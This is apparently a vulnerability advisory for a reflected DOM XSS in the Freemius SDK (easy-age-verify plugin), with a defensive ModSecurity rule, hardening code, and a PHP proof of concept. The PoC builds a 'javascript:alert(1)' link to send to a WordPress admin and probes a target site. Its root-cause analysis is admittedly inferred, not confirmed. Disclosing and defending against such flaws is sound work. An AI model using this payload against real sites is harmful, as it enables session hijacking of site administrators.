Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 6, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (easy-age-verify)

Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.8.5
Patched Version
Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This reflected DOM-based XSS vulnerability affects the Freemius framework library (version 2.10.1 and below) and any WordPress plugins or themes that bundle it, including the easy-age-verify plugin (vulnerable version 1.8.5). The CVSS score is 6.1 (Medium), with network attack vector, low complexity, no privileges required, and user interaction required.

The root cause, inferred from the CWE-79 classification and description, is improper neutralization of user-supplied input in the url parameter within a JavaScript context. The vulnerable code likely reads the url parameter from the URL query string or the DOM and then injects that value into the page without proper encoding. Since the vulnerability is described as DOM-based, the attacker’s input is processed by client-side JavaScript (not server-side PHP), making it a client-side XSS that executes in the victim’s browser. This conclusion is inferred from the CWE and description; no code diff was available for confirmation.

An attacker can craft a link containing a JavaScript payload in the url parameter, such as ?url=javascript:alert(1). When a logged-in administrator opens the link, the vulnerable Freemius JavaScript reads the url parameter and writes it into the DOM without sanitization, so the attacker's script runs in the administrator's session. The attacker needs no account on the site; the only requirement is that the victim follows the link. The exact endpoint varies per plugin; for easy-age-verify, the vulnerable script may be loaded on any page where the Freemius SDK is active.

Remediation likely requires the developer to properly encode or validate the url parameter before using it in DOM operations. Server-side changes can validate the url against an allowlist of known domains. Client-side changes must use safe DOM APIs (e.g., textContent or createTextNode) instead of innerHTML or document.write, and apply URL encoding via encodeURI() or a similar function before updating location-related properties.
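The client-side side of that remediation, as an added example that is not code from Freemius, easy-age-verify or Atomic Edge: a handler for a `url` query parameter that validates the value with the URL parser before it touches the DOM, beside the innerHTML pattern the analysis describes. The parameter name `url`, the site origin `https://shop.example/`, the host allowlist and the element stand-in (used so the block runs under Node without a browser) are all assumptions made for this example. One caveat it makes visible: encodeURI() leaves `:`, `(`, `)` and letters untouched, so `encodeURI('javascript:alert(1)')` returns the input unchanged, and scheme validation, not encoding, is what actually rejects the payload.

```javascript
// Added example (not code from Freemius, easy-age-verify or Atomic Edge):
// a client-side handler for a `url` query parameter that validates the
// value before it reaches the DOM or location.
// Assumptions: the parameter is named `url`; `base` is the site's own
// origin; the element stand-in below replaces a real DOM node so the
// block runs under Node.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Read the raw `url` parameter from a query string such as location.search.
function readUrlParam(search) {
  return new URLSearchParams(search).get('url');
}

// Resolve `raw` against `base` and accept it only if the resulting scheme
// is http(s) and, when `allowedHosts` is given, the host is on the list.
// The URL parser normalises the scheme (case, stray tabs/newlines), so
// javascript:, data: and vbscript: values are rejected however they are cased.
function validateUrlParam(raw, base, allowedHosts = null) {
  if (typeof raw !== 'string' || raw.trim() === '') return null;
  let parsed;
  try {
    parsed = new URL(raw.trim(), base);
  } catch {
    return null; // unparsable input is treated as unsafe
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  if (allowedHosts && !allowedHosts.has(parsed.hostname)) return null;
  return parsed.href;
}

// Minimal stand-in for a DOM element (constructed for this example).
function makeElement() {
  return {
    textContent: '',
    innerHTML: '',
    attrs: new Map(),
    setAttribute(name, value) { this.attrs.set(name, value); },
    removeAttribute(name) { this.attrs.delete(name); },
  };
}

// The flawed pattern the advisory describes: untrusted input concatenated
// into markup, so a javascript: value lands in the href unchanged.
function renderUnsafe(el, raw) {
  el.innerHTML = '<a href="' + raw + '">Continue</a>';
  return el.innerHTML;
}

// Hardened version: validate first, then use textContent/setAttribute
// rather than innerHTML. Returns the href actually applied, or null.
function renderSafe(el, raw, base, allowedHosts = null) {
  const href = validateUrlParam(raw, base, allowedHosts);
  if (href === null) {
    el.removeAttribute('href');
    el.textContent = 'Invalid link';
    return null;
  }
  el.setAttribute('href', href);
  el.textContent = href; // written as a text node, never parsed as HTML
  return href;
}

// encodeURI() is not a defence here: it leaves ':' '(' ')' and letters
// untouched, so a javascript: value survives it byte for byte.
function encodeUriIsNoop(raw) {
  return encodeURI(raw) === raw;
}

// Walk a few constructed inputs through the hardened renderer.
function demo() {
  const base = 'https://shop.example/';
  const hosts = new Set(['shop.example']);
  const inputs = ['/checkout/', 'https://shop.example/faq', 'javascript:alert(1)', '//evil.example/'];
  return inputs.map((raw) => [raw, renderSafe(makeElement(), raw, base, hosts)]);
}
```

In a real page the call would be `renderSafe(document.getElementById('continue'), readUrlParam(location.search), location.origin + '/', allowedHosts)`; the host allowlist is the client-side counterpart of the server-side domain allowlist the analysis recommends, and without it a protocol-relative value like `//evil.example/` still resolves to an https URL on another host.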

Impact if exploited is arbitrary JavaScript execution in the context of the victim's WordPress admin session. An attacker could steal session cookies, perform administrative actions (create new admin users, install malicious plugins), deface the site, or redirect users to phishing pages. The CVSS impact metrics (Low confidentiality, Low integrity) reflect that the outcome depends on the attacker's objectives and the victim's privileges: complete site compromise is possible but not guaranteed.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected DOM XSS via url parameter on any page containing Freemius SDK.
# Targets the url parameter with javascript: or data: schemes.
SecRule REQUEST_URI "@rx /" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius url Parameter XSS',severity:'CRITICAL',tag:'CVE-2024-13362'"
SecRule ARGS_GET:url "@rx ^(javascript|data|vbscript):" "t:lowercase,t:urlDecode"
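To check what the chained rule above actually decides, here is an added emulation of its logic run over constructed request lines; it is not Atomic Edge's engine or ModSecurity itself. It assumes request lines of the form `METHOD URI HTTP/1.1`, and it reproduces one detail worth knowing when tuning this rule: ModSecurity URL-decodes ARGS_GET once while parsing the query string, so the rule's own `t:urlDecode` is a second decode applied on top of that.

```javascript
// Added example (not Atomic Edge's engine or ModSecurity itself): a small
// emulation of the two-rule chain for CVE-2024-13362, run over constructed
// request lines. Assumptions: request lines look like "METHOD URI HTTP/1.1";
// ModSecurity has already URL-decoded ARGS_GET once when it parsed the
// query, so the rule's t:urlDecode is a second decode, reproduced here.

const RULE_ID = 20261994;
const URI_PATTERN = /\//;                              // SecRule REQUEST_URI "@rx /"
const SCHEME_PATTERN = /^(javascript|data|vbscript):/; // chained rule on ARGS_GET:url

// Lenient percent-decoder in the spirit of t:urlDecode: '+' becomes a
// space and malformed escapes are left as they are (decodeURIComponent
// would throw on them instead).
function urlDecodeLenient(s) {
  return s
    .replace(/\+/g, ' ')
    .replace(/%([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Split a request line into method, URI and the GET arguments, decoding
// each argument once, as the engine does when it builds ARGS_GET.
function parseRequestLine(line) {
  const [method, uri] = line.split(' ');
  const args = new Map();
  const qIndex = uri.indexOf('?');
  if (qIndex !== -1) {
    for (const pair of uri.slice(qIndex + 1).split('&')) {
      if (pair === '') continue;
      const eq = pair.indexOf('=');
      const name = eq === -1 ? pair : pair.slice(0, eq);
      const value = eq === -1 ? '' : pair.slice(eq + 1);
      args.set(urlDecodeLenient(name), urlDecodeLenient(value));
    }
  }
  return { method, uri, args };
}

// Evaluate the chain: rule 1 must match REQUEST_URI, then rule 2 applies
// t:lowercase and t:urlDecode (in that order) to ARGS_GET:url and tests
// the scheme pattern. Returns the decision ModSecurity would log.
function evaluateRule(line) {
  const req = parseRequestLine(line);
  if (!URI_PATTERN.test(req.uri)) {
    return { blocked: false, reason: 'REQUEST_URI did not match' };
  }
  if (!req.args.has('url')) {
    return { blocked: false, reason: 'no url argument' };
  }
  const transformed = urlDecodeLenient(req.args.get('url').toLowerCase());
  if (SCHEME_PATTERN.test(transformed)) {
    return { blocked: true, status: 403, id: RULE_ID, value: transformed };
  }
  return { blocked: false, reason: 'url argument has an allowed scheme' };
}

// Constructed sample traffic (not real logs): one benign redirect target,
// three reflected-XSS attempts in differing case/encoding, and one request
// without the parameter at all.
const SAMPLE_REQUESTS = [
  'GET /?url=https%3A%2F%2Fshop.example%2Fcheckout HTTP/1.1',
  'GET /?url=javascript%3Aalert(1) HTTP/1.1',
  'GET /verify/?age=21&url=JavaScript%3Aalert(1) HTTP/1.1',
  'GET /?url=data%3Atext%2Fhtml%2Cx HTTP/1.1',
  'GET /wp-admin/ HTTP/1.1',
];

// One boolean per request line: true where the chain would deny with 403.
function blockedDecisions(lines = SAMPLE_REQUESTS) {
  return lines.map((line) => evaluateRule(line).blocked);
}
```

Because the first rule's pattern `/` matches every request URI, the chain effectively keys only on the `url` GET argument; that keeps the rule portable across plugins bundling the SDK, at the cost of also inspecting the parameter on pages that never load Freemius.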

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC targets the easy-age-verify plugin with Freemius SDK embedded.
// It sends a crafted URL with a malicious url parameter to a front page.
// The vulnerable JavaScript reads the url parameter and injects it into the DOM.

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// JavaScript payload that will execute in the victim's browser
$xss_payload = 'javascript:alert(1)';

// Construct the malicious URL with XSS in the url parameter
$malicious_url = $target_url . '/?url=' . urlencode($xss_payload);

// Output the URL (attacker would trick victim into clicking this link)
echo "Send the following link to an authenticated WordPress admin:\n";
echo $malicious_url . "\n\n";

// Optionally demonstrate via curl - but this is a click-based attack
// We simulate logging the response to verify the payload is reflected
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'AtomicEdge-PoC');
$response = curl_exec($ch);
curl_close($ch);

if ($response === false) {
    die("Error fetching the URL.\n");
}

// Check if the payload appears in the response (may be obfuscated by JS)
if (strpos($response, $xss_payload) !== false) {
    echo "[+] Payload reflected in HTML response (likely vulnerable).\n";
} else {
    echo "[-] Payload not directly reflected in HTML. Check browser DOM for execution.\n";
    echo "    The vulnerability is DOM-based and executes client-side.\n";
}
